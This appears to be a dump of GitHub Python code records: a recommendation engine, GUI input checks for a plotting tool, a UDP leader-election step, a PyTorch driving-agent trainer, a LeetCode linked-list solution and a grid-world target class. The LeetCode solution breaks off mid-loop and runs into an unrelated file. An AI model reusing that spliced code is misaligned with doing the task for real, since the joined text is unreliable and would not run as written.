rankings=[(total/simSums[item],item) for item,total in totals.items( )]\n \n # Return the sorted list\n rankings.sort( )\n rankings.reverse( )\n return rankings\n\n\ndef transformPrefs(prefs):\n\n result={}\n for person in prefs:\n \tfor item in prefs[person]:\n \t\tresult.setdefault(item,{})\n \n # Flip item and person\n \t\tresult[item][person]=prefs[person][item]\n \n return result\n\n\ndef calculateSimilarItems(prefs,n=10):\n # Create a dictionary of items showing which other items they\n # are most similar to.\n result={}\n \n # Invert the preference matrix to be item-centric\n itemPrefs=transformPrefs(prefs)\n \n c=0\n \n for item in itemPrefs:\n # Status updates for large datasets\n \tc+=1\n \n \tif c%100==0:\n \t\tprint(\" %s / %s \" % (c , len(itemPrefs)) ) \n # Find the most similar items to this one\n \tscores=topMatches(itemPrefs,item,n=n,similarity=sim_distance)\n\n \tresult[item]=scores\n \n return result\n\n\ndef getRecommendedItems(prefs,itemMatch,user):\n\n\n\n try:\n 
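# Item-based CF: weight this user's own ratings by the precomputed\r\n    # item-item similarities (itemMatch, as built by calculateSimilarItems\r\n    # above) and normalize by the summed similarity so scores stay on the\r\n    # original rating scale. Typical use, with a hypothetical prefs dict:\r\n    #   itemsim = calculateSimilarItems(prefs, n=10)\r\n    #   getRecommendedItems(prefs, itemsim, some_user)\r\n    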
\tuserRatings=prefs[user]\n except KeyError:\n \treturn []\n\n scores={}\n totalSim={}\n \n # Loop over items rated by this user\n for (item,rating) in userRatings.items( ):\n\n\t # Loop over items similar to this one\n\t for (similarity,item2) in itemMatch[item]:\n\n\t \t# Ignore if this user has already rated this item\n\t \tif item2 in userRatings:\n\t \t\tcontinue\n\n\t\t\t \n\t\t# Weighted sum of rating times similarity\n \t\tscores.setdefault(item2,0)\n\n \t\tscores[item2]+=similarity*rating\n\n\t\t \n\t\t# Sum of all the similarities\n \t\ttotalSim.setdefault(item2,0)\n\n \t\ttotalSim[item2]+=similarity\n\t\t \n\t # Divide each total score by total weighting to get an average\n try:\n \trankings=[ [ score/totalSim[item] , item ] for item,score in scores.items( )]\n except ZeroDivisionError:\n \trankings = []\n \n # Return the rankings from highest to lowest\n rankings.sort( )\n rankings.reverse( )\n \n return rankings\n\n","repo_name":"esomnofu/kitkat","sub_path":"products/recommendations.py","file_name":"recommendations.py","file_ext":"py","file_size_in_byte":4452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4978020828","text":"'''\nentry_checks.py\n\nMay 2022 -- Created -- Mark Ortega-Ponce & Chris Hance\n\n'''\nimport sys\nimport os\nimport datetime\nimport plot.plot_three_axis_graphs\nimport util.station_names\nimport numpy as np\nfrom PySide6.QtWidgets import (QMessageBox)\n\ndef station_code_entry_check(station_name: str) -> bool:\n '''\n Additional check for the station code. \n Makes sure station code entry is a valid 2-4 character station name.\n\n Returns\n -------\n True/False : bool\n False if passed string not in station names, true if it is.\n '''\n # Iterate over columns\n for i in range(0, 3):\n # Iterate over rows\n for x in range(2, 11):\n if station_name == util.station_names.names[x][i]:\n return True\n # If it passed check return True\n return False\n\ndef year_day_entry_check(self) -> bool:\n '''\n Checks to see if there was any input for the \n year day value. Warns user if no input.\n\n Returns\n -------\n True/False : bool\n False if it failed test, true if it passed test.\n '''\n if (len(self.input_year.get_entry()) == 0):\n self.warning_message_pop_up(\n \"Failed Year Day Check: \"\n \"There was no input for the year day entry box\")\n return False\n # If it passed check return True\n return True\n\ndef min_max_time_check(self) -> bool:\n '''\n Checks the two time widgets and \n checks if the start time is less than the end time.\n\n Returns\n -------\n True/False : bool\n False if it failed test, true if it passed test. 
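Hours are compared first, then minutes, then seconds, so equal start and end times fail the check. 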
\n '''\n s_hour = self.start_time.get_hour()\n s_minute = self.start_time.get_minute()\n s_second = self.start_time.get_second()\n\n e_hour = self.end_time.get_hour()\n e_minute = self.end_time.get_minute()\n e_second = self.end_time.get_second()\n\n # start hour is already less than end hour no need to check min or sec\n if s_hour < e_hour:\n return True\n #if start and end hour is same we have to compare min and then sec if need be \n elif s_hour == e_hour:\n # Compare minutes\n if s_minute < e_minute:\n return True\n elif s_minute == e_minute:\n #compare seconds\n if s_second < e_second:\n return True\n else: \n return False\n\ndef axis_entry_checks(x_arr: np.array, y_arr: np.array, z_arr: np.array,\n min_x: int, max_x: int,\n min_y: int, max_y: int,\n min_z: int, max_z: int) -> tuple[int, int, int,\n int, int, int]:\n '''\n Normalizes range of graphs to be about the same.\n Present data in a non-biased view, rather than zoomed into min-max range.\n\n Parameters\n ----------\n x_arr : list\n List of x-values. Pulls min/max in case none were entered by user.\n y_arr : list\n List of y-values. Pulls min/max in case none were entered by user.\n z_arr : list\n List of z_values. Pulls min/max in case none were entered by user.\n min_x : int\n Min x entry from the user, if any.\n max_x : int\n Max x entry from the user, if any.\n min_y : int\n Min y entry from the user, if any.\n max_y : int\n Max y entry from the user, if any.\n min_z : int\n Min z entry from the user, if any.\n max_z : int\n Max z entry from the user, if any.\n\n Returns\n -------\n min_x : int \n Returns default min_x if no input, else returns user input.\n max_x : int\n Returns default max_x if no input, else returns user input.\n min_y : int\n Returns default min_y if no input, else returns user input.\n max_y : int\n Returns default max_y if no input, else returns user input.\n min_z : int\n Returns default min_z if no input, else returns user input.\n max_z : int\n Returns default max_z if no input, else returns user input.\n '''\n # TODO: Add a check for no record value of 99,999.99? 
If we don't, it will choose as max.\n\n default_min_x = np.min(x_arr)\n default_max_x = np.max(x_arr)\n x_midpoint = (default_min_x + default_max_x) / 2\n default_x_range = default_max_x - default_min_x\n\n default_min_y = np.min(y_arr)\n default_max_y = np.max(y_arr)\n y_midpoint = (default_min_y + default_max_y) / 2\n default_y_range = default_max_y - default_min_y\n\n default_min_z = np.min(z_arr)\n default_max_z = np.max(z_arr)\n z_midpoint = (default_min_z + default_max_z) / 2\n default_z_range = default_max_z - default_min_z\n\n # start normalizing ranges between all three graphs\n axis_ranges = [default_x_range, default_y_range, default_z_range]\n\n max_axis_range = np.max(axis_ranges)\n # increasing range by 5%\n # dont want min-max values to be on the\n # edge of the graph from my understanding\n max_axis_range = max_axis_range + max_axis_range * .05\n\n default_min_x = x_midpoint - max_axis_range\n default_min_y = y_midpoint - max_axis_range\n default_min_z = z_midpoint - max_axis_range\n\n default_max_x = x_midpoint + max_axis_range\n default_max_y = y_midpoint + max_axis_range\n default_max_z = z_midpoint + max_axis_range\n\n if min_x == 0:\n min_x = int(default_min_x)\n\n if max_x == 0:\n max_x = int(default_max_x)\n\n if min_y == 0:\n min_y = int(default_min_y)\n\n if max_y == 0:\n max_y = int(default_max_y)\n\n if min_z == 0:\n min_z = int(default_min_z)\n\n if max_z == 0:\n max_z = int(default_max_z)\n\n return min_x, max_x, min_y, max_y, min_z, max_z\n\n# TODO: See if we can modify logic for function calls.\ndef graph_from_plotter_entry_check(xArr: np.array, yArr: np.array, zArr: np.array,\n x_state: bool, y_state: bool,\n z_state: bool, timeArr: np.array,\n filename: str, stime: datetime,\n etime: datetime, format=\"2hz\"):\n \"\"\"\n Plot x, y, z axis depending if they are checked inside the gui.\n\n Parameters\n ----------\n xArr : list\n The x array values.\n yArr : list\n The y array values.\n zArr : list\n The z array values.\n x_state : bool\n The state of x_checkbox in gui.\n y_state : bool\n The state of y_checkbox in gui.\n z_state : bool\n The state of z_checkbox in gui.\n timeArr : list\n The time array values.\n filename : list \n The name of the file.\n stime : Datetime\n The start time stamp HH:MM:SS.\n etime : Datetime\n The end time stamp HH:MM:SS.\n\n Returns\n -------\n fig : Matplotlib.Figure\n The plotted figure.\n \"\"\"\n\n # X, Y, Z plot, clean or raw\n if x_state and y_state and z_state:\n\n fig = plot.plot_three_axis_graphs.x_y_and_z_plot(\n xArr, yArr, zArr, timeArr, filename, stime, etime, format)\n\n # Y, Z plot, clean or raw\n elif y_state and z_state:\n\n fig = plot.plot_three_axis_graphs.plot_two_axis(\n yArr, zArr, timeArr, filename, stime, etime, 'Y', 'Z', format)\n\n # X, Z plot, clean or raw\n elif x_state and z_state:\n\n fig = plot.plot_three_axis_graphs.plot_two_axis(\n xArr, zArr, timeArr, filename, stime, etime, 'X', 'Z', format)\n\n # X, Y plot, clean or raw\n elif x_state and y_state:\n\n fig = plot.plot_three_axis_graphs.plot_two_axis(\n xArr, yArr, timeArr, filename, stime, etime, 'X', 'Y', format)\n\n # For single axis plotting\n else:\n\n if (x_state):\n fig = plot.plot_three_axis_graphs.plot_axis(\n xArr, timeArr, filename, stime, etime, 'X', format)\n\n if(y_state):\n fig = plot.plot_three_axis_graphs.plot_axis(\n yArr, timeArr, filename, stime, etime, 'Y', format)\n\n if(z_state):\n fig = plot.plot_three_axis_graphs.plot_axis(\n zArr, timeArr, filename, stime, etime, 'Z', format)\n\n return fig\n\ndef set_axis_entrys(self, 
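
The normalization in axis_entry_checks centers each axis on its own midpoint but gives all three the same half-range, padded by 5% so extremes don't sit on the plot edge. A self-contained sketch of that arithmetic on made-up arrays:

    import numpy as np

    # Made-up axis data; only the min/max of each array matters here.
    axes = {'x': np.array([10.0, 14.0, 12.0]),
            'y': np.array([100.0, 160.0, 130.0]),
            'z': np.array([-5.0, 5.0, 0.0])}

    # Largest min-to-max spread across the three axes, padded by 5%
    # (mirrors the max_axis_range computation above).
    shared = max(arr.max() - arr.min() for arr in axes.values())
    shared += shared * 0.05

    for name, arr in axes.items():
        mid = (arr.min() + arr.max()) / 2
        print(name, 'limits:', mid - shared, mid + shared)

Every axis ends up with the same plotted span, so a flat trace on one axis is visibly flat rather than zoomed into its own noise.
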
x_min: int, x_max: int, y_min:\n int, y_max: int, z_min: int, z_max: int):\n '''\n Sets the min/max values for x, y, z inside the gui.\n Allows user to see exactly what is being used to plot.\n\n Parameters\n ----------\n x_min : int\n Min x value to set inside the gui.\n x_max : int\n Max x value to set inside the gui.\n y_min : int\n Min y value to set inside the gui.\n y_max : int\n Max y value to set inside the gui.\n z_min : int\n Min z value to set inside the gui.\n z_max : int\n Max z value to set inside the gui.\n '''\n self.spinbox_min_x.set_entry(x_min)\n self.spinbox_max_x.set_entry(x_max)\n self.spinbox_min_y.set_entry(y_min)\n self.spinbox_max_y.set_entry(y_max)\n self.spinbox_min_z.set_entry(z_min)\n self.spinbox_max_z.set_entry(z_max)\n\ndef same_entries(self) -> bool:\n '''\n Function to check if current information in the gui\n has already been plotted in the stacked graph style.\n Checks to see if:\n - Current start time is equal to previous start time.\n - Current end time is equal to previous end time.\n - Current x/y/z min values are equal to previous min x/y/z values.\n - Current x/y/z max values are equal to previous max x/y/z values.\n If all these 8 checks result in true, then we return false to indicate\n test failed, and to not plot the graph again. Plotting takes (~1.5 seconds)\n and gui cannot respond to any other user events during this time.\n\n Returns\n -------\n True/False : bool\n False if passed string not in station names, true if it is.\n '''\n\n # get current start times, and end time\n curr_start_time, curr_end_time = self.time_stamp()\n\n flag = 0\n\n if curr_start_time == self.start_time_stamp:\n flag += 1\n if curr_end_time == self.end_time_stamp:\n flag += 1\n if self.prev_min_x == self.spinbox_min_x.get_entry():\n flag += 1\n if self.prev_max_x == self.spinbox_max_x.get_entry():\n flag += 1\n if self.prev_min_y == self.spinbox_min_y.get_entry():\n flag += 1\n if self.prev_max_y == self.spinbox_max_y.get_entry():\n flag += 1\n if self.prev_min_z == self.spinbox_min_z.get_entry():\n flag += 1\n if self.prev_max_z == self.spinbox_max_z.get_entry():\n flag += 1\n\n if flag == 8:\n # exact same entries\n return False\n else:\n return True\n\ndef same_entries_one_toggled(self) -> bool:\n '''\n Function to check if current information in the gui\n has already been plotted in the three graph axis style graph.\n Checks to see if:\n - Current start time is equal to previous start time.\n - Current end time is equal to previous end time.\n - Current x checkbox state is same as previous state.\n - Current y checkbox state is same as previous state.\n - Current z checkbox state is same as previous state.\n If all these 5 checks result in true, then we return false to\n indicate test failed, and to not plot the graph again. 
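
same_entries counts matching fields with a flag variable; the identical check can be phrased with all() over (previous, current) pairs, which makes what the flag count expresses easier to read. The values below are made up:

    # all() is True only when every pair matches -- exactly the case
    # where same_entries() returns False to skip an expensive replot.
    pairs = [
        ('10:00:00', '10:00:00'),  # start time stamp: previous vs current
        ('12:00:00', '12:00:00'),  # end time stamp
        (0, 0), (100, 100),        # x min / max spinbox entries
        (-50, -50), (50, 50),      # y min / max
        (1, 1), (9, 9),            # z min / max
    ]
    already_plotted = all(prev == curr for prev, curr in pairs)
    print('skip replot:', already_plotted)
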
Plotting\n takes (~1.5 seconds) and gui cannot respond to any other user\n events during this time.\n\n Returns\n -------\n True/False : bool\n False if passed string not in station names, true if it is.\n '''\n\n curr_start_time, curr_end_time = self.time_stamp()\n\n flag = 0\n\n if curr_start_time == self.start_time_stamp:\n flag += 1\n if curr_end_time == self.end_time_stamp:\n flag += 1\n\n if self.prev_state_plot_x == self.checkbox_x.isChecked():\n flag += 1\n\n if self.prev_state_plot_y == self.checkbox_y.isChecked():\n flag += 1\n\n if self.prev_state_plot_z == self.checkbox_z.isChecked():\n flag += 1\n\n if flag == 5:\n return False\n else:\n return True\n\n# TODO: See if logic can me modified for this inside the gui.\ndef same_axis_entries(self) -> bool:\n '''\n Function to check if user has changed axis or\n time widget in the gui, but left entry values the same.\n If true is returned, we reset the gui entries\n so graph can pick new min/max values for the graph\n based off values in the new time range. If value's aren't\n reset the graph will have min/max values that might not\n actually be inside the time range picked, making the graph\n appear flat.\n '''\n\n flag = 0\n\n if self.prev_min_x == self.spinbox_min_x.get_entry():\n flag += 1\n if self.prev_max_x == self.spinbox_max_x.get_entry():\n flag += 1\n if self.prev_min_y == self.spinbox_min_y.get_entry():\n flag += 1\n if self.prev_max_y == self.spinbox_max_y.get_entry():\n flag += 1\n if self.prev_min_z == self.spinbox_min_z.get_entry():\n flag += 1\n if self.prev_max_z == self.spinbox_max_z.get_entry():\n flag += 1\n\n if flag == 6:\n return True\n else:\n return False\n\n\ndef checks(self) -> bool:\n \n '''\n Function that goes through most of the entry_check.py functions.\n - Checks for filename, has user chosen a file yet?\n - Checks for valid station code.\n - Checks for valid year day value.\n - Checks that start time is less than end time.\n - Checks that at least one checkbox is checked if we \n are in one graph mode.\n If any of these tests fail, we return false.\n\n Returns\n -------\n True/False : bool\n False if passed string not in station names, true if it is.\n '''\n\n # Makes sure we have a file\n if len(self.filename) == 0:\n return False\n\n # Checks the 2 char station code is a code that fits in our station_names.py array\n station_code = self.input_station_code.get_entry()\n if not station_code_entry_check(station_code):\n return False\n\n # Just makes sure there is some entry in the yearday slot \n # Right now no real check to see if the year day is a valid combo\n # but if we have a value the file itself should lay it properly before hand\n year_day = self.input_year.get_entry()\n if not year_day_entry_check(self):\n return False\n\n if not min_max_time_check(self):\n return False\n\n x_state = self.checkbox_x.isChecked()\n y_state = self.checkbox_y.isChecked()\n z_state = self.checkbox_z.isChecked()\n\n any_state = x_state or y_state or z_state\n\n if self.button_graph_switch.three_axis_style.isChecked():\n if not any_state:\n return False\n\n return True\n","repo_name":"maccs-augsburg/spacedatapython","sub_path":"gui/entry_check.py","file_name":"entry_check.py","file_ext":"py","file_size_in_byte":14456,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"20019171971","text":"import socket\nimport json\n\n\nclass RAFTFactory:\n \"\"\"Functionality for the initial election in RAFT.\"\"\"\n\n def __init__(self, service_info : dict,\n udp_host : 
str = \"127.0.0.1\",\n udp_port : int = 4444,\n udp_buffer_size : int = 1024,\n num_followers : int = 2):\n self.udp_host = udp_host\n self.udp_port = udp_port\n self.udp_buffer_size = udp_buffer_size\n self.udp_socket = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)\n self.service_info = service_info\n self.num_followers = num_followers\n self.followers = []\n\n\n def election(self):\n \"\"\"\n Determines the leader and the followers. \n The first one connected to the UDP connection\n will be the leader the rest will be the followers.\n \"\"\"\n\n # The election ends when all the expected number of followers\n # connected and each sent 2 messages: accept and credentials.\n self.min_num_msgs = self.num_followers * 2\n\n # All services try to connect using the UDP connection\n # and try bind to the connection.\n try:\n # Only one will succeed in this, and this service will become the Leader.\n self.udp_socket.bind((self.udp_host, self.udp_port))\n self.role = \"leader\"\n\n # Starting to gather the information about the followers as they connect using UDP.\n count_of_msgs = 0\n while True:\n # Reading the message and the address from connection.\n message, address = self.udp_socket.recvfrom(self.udp_buffer_size)\n\n if message.decode() == \"Accept\":\n # The Leader should responde back with it's HTTP credentials \n # (ip, port, token for writes) to inform the followers about it's location.\n # if the follower accepted him.\n data = json.dumps(self.service_info)\n count_of_msgs += 1\n self.udp_socket.sendto(str.encode(data), address)\n else:\n # After getting the Leader's information the \n # Followers should send back their HTTP credentials.\n message = message.decode()\n count_of_msgs += 1\n follower_data = json.loads(message)\n self.followers.append(follower_data)\n if count_of_msgs >= self.min_num_msgs:\n break\n except:\n # The rest of services will become Followers.\n self.role = \"follower\"\n\n # After becoming a Follower the services should send to \n # the leader an accept message informing they accept him being a leader.\n self.leader_data = self.send_data(\"Accept\")\n\n # Sending back to the leader the follower's credentials.\n self.send_data(self.service_info)\n self.udp_socket.close()\n\n\n def send_data(self, msg):\n \"\"\"Data send by the followers.\"\"\"\n\n if type(msg) is str:\n # Send the accept message to the leader.\n bytes_to_send = str.encode(msg)\n self.udp_socket.sendto(bytes_to_send, (self.udp_host, self.udp_port))\n msg_from_server = self.udp_socket.recvfrom(self.udp_buffer_size)[0]\n return json.loads(msg_from_server.decode())\n else:\n # Send the followers credentials to the leader.\n str_dict = json.dumps(msg)\n bytes_to_send = str.encode(str_dict)\n self.udp_socket.sendto(bytes_to_send, (self.udp_host, self.udp_port))","repo_name":"Frunnze/PR_Laboratories","sub_path":"LAB8/service1/raft.py","file_name":"raft.py","file_ext":"py","file_size_in_byte":3680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11825555551","text":"import gzip\nimport os\nimport pickle\nimport random\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\n\nfrom util import \\\n available_actions, \\\n data_transform, \\\n DATA_DIR, \\\n DATA_FILE, \\\n MODEL_FILE\n\nrestore = False # restore from file if exists\nBATCH_SIZE = 32 # mb size\nEPOCHS = 30 # number of epochs\nTRAIN_VAL_SPLIT = 0.85 # train/val ratio\n\n# balance the dataset by multiplying rare 
events\nMULTIPLY_RARE_EVENTS = 20\n\n\ndef read_data():\n \"\"\"Read the data generated by keyboard_agent.py\"\"\"\n with gzip.open(os.path.join(DATA_DIR, DATA_FILE), 'rb') as f:\n data = pickle.load(f)\n\n # balance dataset by multiplying\n # brake, right+brake, left+brake events\n # since they are too few\n if MULTIPLY_RARE_EVENTS > 1:\n data_copy = data.copy()\n for d in data:\n for a in ([[-1, 0, 1], [1, 0, 1], [0, 0, 1]]):\n if np.array_equal(d[1], a):\n data_copy += (d,) * MULTIPLY_RARE_EVENTS\n\n data = data_copy\n\n random.shuffle(data)\n\n # to numpy arrays\n states, actions, _, _, _ = map(np.array, zip(*data))\n\n # reverse one-hot, actions to classes\n act_classes = np.full((len(actions)), -1, dtype=np.int)\n for i, a in enumerate(available_actions):\n act_classes[np.all(actions == a, axis=1)] = i\n\n # drop unsupported actions\n states = np.array(states)\n states = states[act_classes != -1]\n act_classes = act_classes[act_classes != -1]\n\n # drop some of the acceleration actions to balance the dataset\n non_accel = act_classes != available_actions.index([0, 1, 0])\n drop_mask = np.random.rand(act_classes[~non_accel].size) > 0.7\n non_accel[~non_accel] = drop_mask\n states = states[non_accel]\n act_classes = act_classes[non_accel]\n\n # drop some of the non-action actions to balance the dataset\n non_act = act_classes != available_actions.index([0, 0, 0])\n drop_mask = np.random.rand(act_classes[~non_act].size) > 0.3\n non_act[~non_act] = drop_mask\n states = states[non_act]\n act_classes = act_classes[non_act]\n\n for i, a in enumerate(available_actions):\n print(\"Actions of type {}: {}\"\n .format(str(a), str(act_classes[act_classes == i].size)))\n\n print(\"Total transitions: \" + str(len(act_classes)))\n\n return states, act_classes\n\n\ndef create_datasets():\n \"\"\"Create training and validation datasets\"\"\"\n\n class TensorDatasetTransforms(torch.utils.data.TensorDataset):\n \"\"\"\n Helper class to allow transformations\n by default TensorDataset doesn't support them\n \"\"\"\n\n def __init__(self, x, y):\n super().__init__(x, y)\n\n def __getitem__(self, index):\n tensor = data_transform(self.tensors[0][index])\n return (tensor,) + tuple(t[index] for t in self.tensors[1:])\n\n x, y = read_data()\n x = np.moveaxis(x, 3, 1) # channel first (torch requirement)\n\n # train dataset\n x_train = x[:int(len(x) * TRAIN_VAL_SPLIT)]\n y_train = y[:int(len(y) * TRAIN_VAL_SPLIT)]\n\n train_set = TensorDatasetTransforms(\n torch.tensor(x_train),\n torch.tensor(y_train))\n\n train_loader = torch.utils.data.DataLoader(train_set,\n batch_size=BATCH_SIZE,\n shuffle=True,\n num_workers=2)\n\n # test dataset\n x_val, y_val = x[int(len(x_train)):], y[int(len(y_train)):]\n\n val_set = TensorDatasetTransforms(\n torch.tensor(x_val),\n torch.tensor(y_val))\n\n val_loader = torch.utils.data.DataLoader(val_set,\n batch_size=BATCH_SIZE,\n shuffle=False,\n num_workers=2)\n\n return train_loader, val_loader\n\n\ndef build_network():\n \"\"\"Build the torch network\"\"\"\n\n class Flatten(nn.Module):\n \"\"\"\n Helper class to flatten the tensor\n between the last conv and first fc layer\n \"\"\"\n\n def forward(self, x):\n return x.view(x.size()[0], -1)\n\n # Same network as with the DQN example\n model = torch.nn.Sequential(\n torch.nn.Conv2d(1, 32, 8, 4),\n torch.nn.BatchNorm2d(32),\n torch.nn.ELU(),\n torch.nn.Dropout2d(0.5),\n torch.nn.Conv2d(32, 64, 4, 2),\n torch.nn.BatchNorm2d(64),\n torch.nn.ELU(),\n torch.nn.Dropout2d(0.5),\n torch.nn.Conv2d(64, 64, 3, 1),\n torch.nn.ELU(),\n 
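
The class balancing in read_data relies on writing a random boolean mask back into the inverted selection of an overrepresented class. A tiny standalone version of that trick (the labels and the 0.7 threshold are illustrative):

    import numpy as np

    rng = np.random.default_rng(0)
    labels = np.array([1, 1, 0, 1, 1, 1, 0, 1])  # class 1 is overrepresented

    keep = labels != 1                               # True for every other row
    drop_mask = rng.random(keep[~keep].size) > 0.7   # keep ~30% of class 1
    keep[~keep] = drop_mask                          # write survivors back in
    print('rows kept:', keep.sum(), 'of', keep.size)

`keep[~keep] = drop_mask` works because boolean indexing on the left-hand side assigns element-wise into exactly the positions that were False, which is how the `non_accel[~non_accel] = drop_mask` lines above thin out the acceleration and no-op actions.
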
Flatten(),\n torch.nn.BatchNorm1d(64 * 7 * 7),\n torch.nn.Dropout(),\n torch.nn.Linear(64 * 7 * 7, 120),\n torch.nn.ELU(),\n torch.nn.BatchNorm1d(120),\n torch.nn.Dropout(),\n torch.nn.Linear(120, len(available_actions)),\n )\n\n return model\n\n\ndef train(model, device):\n \"\"\"\n Training main method\n :param model: the network\n :param device: the cuda device\n \"\"\"\n\n loss_function = nn.CrossEntropyLoss()\n\n optimizer = optim.Adam(model.parameters())\n\n train_loader, val_order = create_datasets() # read datasets\n\n # train\n for epoch in range(EPOCHS):\n print('Epoch {}/{}'.format(epoch + 1, EPOCHS))\n\n train_epoch(model,\n device,\n loss_function,\n optimizer,\n train_loader)\n\n test(model, device, loss_function, val_order)\n\n # save model\n model_path = os.path.join(DATA_DIR, MODEL_FILE)\n torch.save(model.state_dict(), model_path)\n\n\ndef train_epoch(model, device, loss_function, optimizer, data_loader):\n \"\"\"Train for a single epoch\"\"\"\n\n # set model to training mode\n model.train()\n\n current_loss = 0.0\n current_acc = 0\n\n # iterate over the training data\n for i, (inputs, labels) in enumerate(data_loader):\n # send the input/labels to the GPU\n inputs = inputs.to(device)\n labels = labels.to(device)\n\n # zero the parameter gradients\n optimizer.zero_grad()\n\n with torch.set_grad_enabled(True):\n # forward\n outputs = model(inputs)\n _, predictions = torch.max(outputs, 1)\n loss = loss_function(outputs, labels)\n\n # backward\n loss.backward()\n optimizer.step()\n\n # statistics\n current_loss += loss.item() * inputs.size(0)\n current_acc += torch.sum(predictions == labels.data)\n\n total_loss = current_loss / len(data_loader.dataset)\n total_acc = current_acc.double() / len(data_loader.dataset)\n\n print('Train Loss: {:.4f}; Accuracy: {:.4f}'.format(total_loss, total_acc))\n\n\ndef test(model, device, loss_function, data_loader):\n \"\"\"Test over the whole dataset\"\"\"\n\n model.eval() # set model in evaluation mode\n\n current_loss = 0.0\n current_acc = 0\n\n # iterate over the validation data\n for i, (inputs, labels) in enumerate(data_loader):\n # send the input/labels to the GPU\n inputs = inputs.to(device)\n labels = labels.to(device)\n\n # forward\n with torch.set_grad_enabled(False):\n outputs = model(inputs)\n _, predictions = torch.max(outputs, 1)\n loss = loss_function(outputs, labels)\n\n # statistics\n current_loss += loss.item() * inputs.size(0)\n current_acc += torch.sum(predictions == labels.data)\n\n total_loss = current_loss / len(data_loader.dataset)\n total_acc = current_acc.double() / len(data_loader.dataset)\n\n print('Test Loss: {:.4f}; Accuracy: {:.4f}'\n .format(total_loss, total_acc))\n\n\nif __name__ == '__main__':\n dev = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n m = build_network()\n\n if restore:\n model_path = os.path.join(DATA_DIR, MODEL_FILE)\n m.load_state_dict(torch.load(model_path))\n\n m.eval()\n m = m.to(dev)\n train(m, dev)\n","repo_name":"PacktPublishing/Python-Deep-Learning-Second-Edition","sub_path":"Chapter10/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":7931,"program_lang":"python","lang":"en","doc_type":"code","stars":114,"dataset":"github-code","pt":"37"} +{"seq_id":"18046021839","text":"# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution(object):\n def getArrayForm(self,head):\n \n if head==None:\n return []\n ar=[]\n temp=head\n while(temp!=None):\n 
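
The hard-coded 64 * 7 * 7 flatten size after Flatten() implies an 84x84 single-channel input: (84-8)/4+1 = 20, then (20-4)/2+1 = 9, then (9-3)/1+1 = 7. A dummy forward pass through just the conv stack confirms the arithmetic:

    import torch

    convs = torch.nn.Sequential(
        torch.nn.Conv2d(1, 32, 8, 4),   # 84 -> 20
        torch.nn.Conv2d(32, 64, 4, 2),  # 20 -> 9
        torch.nn.Conv2d(64, 64, 3, 1),  # 9 -> 7
    )
    out = convs(torch.zeros(1, 1, 84, 84))
    print(out.shape)  # torch.Size([1, 64, 7, 7])

The 84x84 figure is inferred from the layer shapes, not stated in the file; if data_transform produced a different resolution, the first Linear layer would fail with a shape mismatch.
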
ar.append(temp.val)\n temp=temp.next\n return ar\n \n def removeNthFromEnd(self, head, n):\n \"\"\"\n :type head: ListNode\n :type n: int\n :rtype: ListNode\n \"\"\"\n if head==None:\n return head\n \n ar= self.getArrayForm(head)\n size=len(ar)\n ar.pop(size-n)\n print(ar)\n if len(ar)<1:\n return None\n \n head=ListNode(ar[0])\n temp=head\n prev=head\n if len(ar)==1:\n \n head.next=None\n return head\n \n i=1\n while(i 0:\n\t\t\tself.face = 0 # east\n\t\telif self.x - self.lastX < 0:\n\t\t\tself.face = 180 # west\n\t\telse:\n\t\t\tif self.y - self.lastY >0:\n\t\t\t\tself.face = 270 # south\n\t\t\telse:\n\t\t\t\tself.face = 90 # north\n\n\tdef preferenceMove(self,grids_x,grids_y):\n\t\t# until find a valid move\n\t\twhile True:\n\t\t\t# random chance that target change face direction\n\t\t\tif randint(1,10) == 0:\n\t\t\t\tself.moveFace()\n\t\t\t\tbreak\n\t\t\t# random chance to move\n\t\t\t# moveX,moveY = randint(-1,1),randint(-1,1)\n\t\t\tmoveX,moveY = random.choice([(1,0),(0,1),(0,-1)])\n\t\t\tnewX,newY = self.x+moveX,self.y+moveY\n\t\t\t# check boundary (never walk along the boundary, at least one block away from boundary)\n\t\t\tif (newX>=1 and newX<=grids_x-2) and (newY>=1 and newY<=grids_y-2):\n\t\t\t\tself.walk(newX, newY)\n\t\t\t\tbreak\n\t\treturn (moveX,moveY)\n\n\t# target decide to move or look around at still\n\tdef randmove(self,grids_x,grids_y):\n\t\t# until find a valid move\n\t\twhile True:\n\t\t\t# random chance that target change face direction\n\t\t\tif randint(1,10) == 0:\n\t\t\t\tself.moveFace()\n\t\t\t\tbreak\n\t\t\t# random chance to move\n\t\t\t# moveX,moveY = randint(-1,1),randint(-1,1)\n\t\t\tmoveX,moveY = random.choice([(1,0),(-1,0),(0,1),(0,-1)])\n\t\t\tnewX,newY = self.x+moveX,self.y+moveY\n\t\t\t# check boundary (never walk along the boundary, at least one block away from boundary)\n\t\t\tif (newX>=1 and newX<=grids_x-2) and (newY>=1 and newY<=grids_y-2):\n\t\t\t\tself.walk(newX, newY)\n\t\t\t\tbreak\n\t\treturn (moveX,moveY)\n\n\tdef move(self,grids_x,grids_y):\n\t\tif self.randMove:\n\t\t\treturn self.randmove(grids_x,grids_y)\n\t\telse:\n\t\t\treturn self.preferenceMove(grids_x,grids_y)\n\n\t# according to input location of targey (x,y), return reward\n\tdef computeRewardMatrix(self):\n\t\tx, y = self.x, self.y\n\t\tface,faceAngle = self.face, self.faceAngle\n\t\tsize = 2*self.rewardRange+1\n\t\t# rewardMatrix = [ [0 for x in range(size)] for y in range(size)]\n\t\tfaceDirection = face + faceAngle\n\t\tfaceDirection = (faceDirection+360) % 360\n\t\tself.rewardMatrix[0] = self.rewardMatrix[0] % 360\n\t\t# rotate to correct direction\n\t\twhile self.rewardMatrix[0]%360 != faceDirection:\n\t\t\tself.rewardMatrix[1] = np.rot90( self.rewardMatrix[1])\n\t\t\tself.rewardMatrix[0] += 90\n\n\t# return reward of a specific location\n\tdef getReward(self,x,y):\n\t\tif not self.isReward(x,y):\n\t\t\treturn 0\n\t\trelative_x = x-self.x + self.rewardRange\n\t\trelative_y = y-self.y + self.rewardRange \n\t\treturn 